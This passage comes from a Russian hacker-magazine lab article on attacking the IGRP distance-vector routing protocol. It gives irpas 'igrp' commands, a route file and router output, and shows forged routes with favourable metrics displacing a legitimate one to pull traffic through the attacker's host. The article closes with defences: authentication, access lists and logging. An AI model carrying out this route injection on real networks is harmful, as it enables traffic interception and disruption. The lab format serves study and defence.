лабораторная работа КОНСТАНТИН ГАВРИЛЕНКО Спецвыпуск: Хакер, номер #066, стр. 066-018-13 Metric = Metric * K5/ (reliability + K4) Константы К1 — К5 используются для более детального контроля над получаемой метрикой и адаптации протокола для нужд конкретной сети. По умолчанию константы К1 и К3 равны 1, а константы К2, К4 и К5 — 0. Листинг 36. Упрощенное уравнение Metric = (bandwidth + delay) Опыт показывает, что обычно системные администраторы не изменяют значения констант. Впрочем, делать это и не рекомендуется, кроме тех случаев, когда ты досконально знаешь особенности работы алгоритма протокола маршрутизации (каким образом такие изменения могут повлиять на работу маршрутизаторов). Как и в остальных протоколах маршрутизации по вектору расстояния, предпочтение отдается маршруту с меньшей метрикой. [ЭКСПЕРИМЕНТ (продолжение)] [ввод новых маршрутов в IGRP.] Для ввода новых маршрутов можно воспользоваться утилитой igrp из irpas suite — единственным на сегодня доступным средством ввода произвольных маршрутов в протокол IGRP. Листинг 36. Ввод новых маршрутов arhontus irpas # ./igrp --help Usage: ./igrp [-v[v[v]]] -i <interface> -f <routes file> -a <autonomous system> [-b brute force end] [-S <spoofed source IP>] [-D <destination ip>] Дополнительно создадим файл, где описаны маршруты, которые будем вводить в автономную систему. Листинг 37. Формат файла, в котором описаны маршруты route:delay:bandwidth:mtu:reliability:load:hopcount Листинг 38. Таблица маршрутизации sh ip route igrp I 192.168.10.0/24 [100/8576] via 192.168.69.100, 00:00:16, Ethernet0 I 192.168.40.0/24 [100/8265] via 192.168.69.100, 00:00:16, Ethernet0 Листинг 39. Ввод произвольного маршрута и изменение таблицы маршрутизации arhontus irpas # cat routes.kos 192.168.10.0:1000:476:1500:255:1:1 arhontus irpas # ./igrp -v -i eth0 -a 31337 -D 192.168.69.36 -f routes.kos sh ip route igrp I 192.168.10.0/24 [100/8576] via 192.168.69.100, 00:00:16, Ethernet0 I 192.168.40.0/24 [100/8265] via 192.168.69.100, 00:00:16, Ethernet0 I 192.168.55.0/24 [100/2100] via 192.168.69.102, 00:00:02, Ethernet0 Наш маршрут был принят без особых проблем. Теперь попытаемся изменить маршрутизацию существующих маршрутов и перенаправить весь трафик через себя. Зная, каким образом подсчитывается метрика, укажем самые выигрышные значения вводимого маршрута, отошлем его маршрутизатору и посмотрим, каким образом изменилась метрика. Листинг 40. Посыл маршрутизатору и изменение метрики arhontus irpas # cat routes.kos 192.168.10.0:1:1:1500:255:1:1 sh ip route igrp I 192.168.10.0/24 [100/1101] via 192.168.69.102, 00:00:01, Ethernet0 Наш маршрут вытеснил предыдущий легитимный маршрут, чего мы и хотели. Не забудь посылать регулярные пакеты обновлений каждые 90 секунд, иначе твой маршрут объявят мертвым и быстро исключат из таблицы маршрутизации. Листинг 41. Значения по умолчанию (команда sh ip protocols) 2503b#sh ip protocols Routing Protocol is "igrp 31337" Sending updates every 90 seconds, next due in 32 seconds Invalid after 270 seconds, hold down 280, flushed after 630 [ВЫВОДЫ] Мы рассмотрели принципы атак на протоколы маршрутизации, работающие по алгоритму маршрутизации по вектору расстояния. Большинство описанных атак могут быть предотвращены или вовремя замечены, если протоколы маршрутизации настроены правильно и используются аутентификация и листы контроля доступа, также при установке и мониторинге сервера журнала событий. Жаль, но мы живем в неидеальном мире, и большинство системных администраторов забывают или просто игнорируют важность обеспечения безопасности протоколов маршрутизации. В то же время помни: тот, кто контролирует маршруты, соединяющие сети, тот контролирует сеть в целом |